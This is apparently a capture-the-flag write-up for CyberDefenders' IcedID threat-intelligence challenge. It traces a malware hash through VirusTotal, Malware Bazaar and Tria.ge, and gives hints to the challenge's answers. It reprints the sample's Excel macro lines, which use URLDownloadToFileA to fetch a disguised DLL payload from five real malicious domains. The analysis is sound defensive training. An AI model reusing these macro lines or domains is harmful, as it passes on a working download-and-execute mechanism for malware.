Investigate IcedID malware using VirusTotal and threat intelligence platforms to identify IOCs, associated threat actors, and execution mechanisms.
Introduction
CyberDefenders IcedID challenge is another Easy challenge. This challenge room is another threat intel focused room so we’ll likely be using any.run, RecordedFuture’s Tria.ge platform, and probably VirusTotal as well.
Here’s the introduction to the challenge:
A cyber threat group was identified for initiating widespread phishing campaigns to distribute further malicious payloads. The most frequently encountered payloads were IcedID. You have been given a hash of an IcedID sample to analyze and monitor the activities of this advanced persistent threat (APT) group.
Sounds neat! We won’t be playing with any malware samples today, but threat intel with just a hash to go oof can still be pretty fun.
Like in prior challenge rooms from CyberDefenders we can download the lab files locally. For all of the ‘Easy’ rooms they’ve only contained a .txt file with a hash. It’s no different here:
~/Downloads> unzip ./174-IcedID.zip
Archive: ./174-IcedID.zip
[./174-IcedID.zip] temp_extract_dir/hash.txt password:
inflating: temp_extract_dir/hash.txt
~/Downloads> cd temp_extract_dir/
~/D/temp_extract_dir> cat hash.txt
191eda0c539d284b29efe556abb05cd75a9077a0
Use this hash on online threat intel platforms (e.g., VirusTotal, Hybrid Analysis) to complete the lab analysis.
Question one
What is the name of the file associated with the given hash?
Like with all of these questions, there is no doubt many differen ways to find the answer. One of the easiest ways to find a file associated with a hash is by checking the VirusTotal Details page.
VirusTotal usually shows the most common name underneath the hash at the top of the page. This can be a pretty good way to catch basic details. Oddly the name shown is d86405130184186154daa4a5132dd1364ab05d1f14034c7f0a0cda690a91116d.xlsx.bin - The hash, with .xlsx.bin appended at the end.
This is not the answer. To find that we need to go to the details page. Under the Names sub-heading you’ll see a few entries:
d86405130184186154daa4a5132dd1364ab05d1f14034c7f0a0cda690a91116d.xlsx.bin
d86405130184186154daa4a5132dd1364ab05d1f14034c7f0a0cda690a91116d.xlsx
sample_04.xlsx
717.xlsx
document-1982481273.xlsm
One of these is the answer. Check on the format of the answer to narrow it down.
Question two
Can you identify the filename of the GIF file that was deployed?
Head over to the Relations tab. The .gif file can be seen under the Contacted URLs.
Looking a bit deeper we can see that the same filename appears under the Dropped Files section. Note that it does not appear as a .gif, infact it shows that it is a Win32 DLL with 59 out of 71 vendors detecting it as malicious.
This is pretty major red flag, but it’s also good to confirm that this is something that has previously been reported as being malicious.
Question three
How many domains does the malware look to download the additional payload file in Q2?
Halfway there!
This question is worded slightly weirdly. We can find this answer pretty easily on the same Relations page.
Under that same Contacted URLs section we can just count how many times the malware attempts to contact the .gif file.
Question four
From the domains mentioned in Q3, a DNS registrar was predominantly used by the threat actor to host their harmful content, enabling the malware’s functionality. Can you specify the Registrar INC?
Checking on the Contacted Domains section in the above link we can see the registrars. It appears that the information here may be outdated - Or more specifically the question is outdated. There is one registrar which stands out as showing up more often: MarkMonitor Inc. You’ll find that this is not the correct answer, though.
Of the three domains registered through MarkMonitor Inc, these are all legitimate sites. The question is looking for a registrar used by the threat actor for malicious domains. The malware may reach out to legitimate domains for a variety of reasons, sometimes just reaching out to something common like Google or Reddit will act as a simple network check.
Let’s say you’re developing some malware (You hooligan, you). You want to exfiltrate data in some way over the network (TA0010), before you attempt to exfiltrate any data you decide to have your malware check if the infected endpoint is even connected to the internet.
You could ping your C2 server and only continue if you receive a 200 http code, but this could trigger an EDR alert for a connection to new domains, or if your malware is already out in the wild you could find that your C2 has been reported (This would be bad for you anyway, but that’s beside the point for now). Instead you can send an innoculous request to something like a Microsoft URL. Depending on how your malware is packaged, you could even copy a domain from a legitimate Windows process to check for updates, or something of that ilk. Either way, as long as you receive the 200 http code back, you know that you’re online.
This might still trigger an alert, but if a SOC analyst looks at the process-tree and runs the URL through VirusTotal, they’ll likely just assume it’s a benign action by some windows process. I’ve seen something like this, where a SOC Analyst is faced with a whole page of alerts, they see URLs highlighted and check it in VirusTotal, see it’s a legitimate Microsoft URL, then mark the alert as a false positive and move on. This can be especially bad if they go the further step and add the application to an allow-list.
It’s unlikely that this would all happen, and when your malware finally gets around to exfiltrating data this would hopefully trigger more severe alerts, but it’s not impossible to imagine the scenario where a legitimate URL request results in malware being overlooked.
All that to say - Legitimate URL strings being found doesn’t immediately mean that the program is also legitimate. It could be a network connectivity check, or C2 infrastructure is being hosted on a legitimate cloud platform, like AWS.
Going back to the question at hand, the answer is actually the registrar that only has one entry. It’s a very cheap way of getting a domain. I use the same one, in fact.
Question five
Could you specify the threat actor linked to the sample provided?
We’ll move over to Abuse.ch’s Malware Bazaar for the filehash for this question. We can observe some more information here, specifically other vendors threat intelligence reports. We can check the ‘IcedID’ tag on the Malware Bazaar which will link us to the malpedia page.
The top of the Malpedia page shows the threat actor(s) who has been observed using the IcedID malware previously. We can thank all the threat researchers who have written reports for this attribution, it’s hard work and I can only imagine how long it takes.
All we need to do for this question is find the actor that lines up with the question. There are two shown, so you have a 50/50 of getting it on your first try!
Question six
In the Execution phase, what function does the malware employ to fetch extra payloads onto the system?
Final question!
We’ll go to the sandbox/hash search that is quickly becoming one of my favorites - RecordedFuture’s Tria.ge. Here’s the link for the report on the hash. The Malware Config section is important to focus on here. We can see a section of the macro contained in the .xlsx:
=CALL("URLMon", "URLDownloadToFileA", "JCCB", 0, "https://metaflip.io/ds/3003.gif", "..\ksjvoefv.skd")
=CALL("URLMon", "URLDownloadToFileA", "JCCB", 0, "https://partsapp.com.br/ds/3003.gif", "..\ksjvoefv.skd1")
=CALL("URLMon", "URLDownloadToFileA", "JCCB", 0, "https://columbia.aula-web.net/ds/3003.gif", "..\ksjvoefv.skd2")
=CALL("URLMon", "URLDownloadToFileA", "JCCB", 0, "https://tajushariya.com/ds/3003.gif", "..\ksjvoefv.skd3")
=CALL("URLMon", "URLDownloadToFileA", "JCCB", 0, "https://agenbolatermurah.com/ds/3003.gif", "..\ksjvoefv.skd4")
Every line above contains the answer. We can see a few of the malicious endpoints too! The question is asking for the function, if you know how Macros work this should be easy to spot, if not… Check the length of the expected answer and you should find it quickly
Conclusion
Another fun little ThreatIntel room from CyberDefenders. I definitely recommend giving it a try!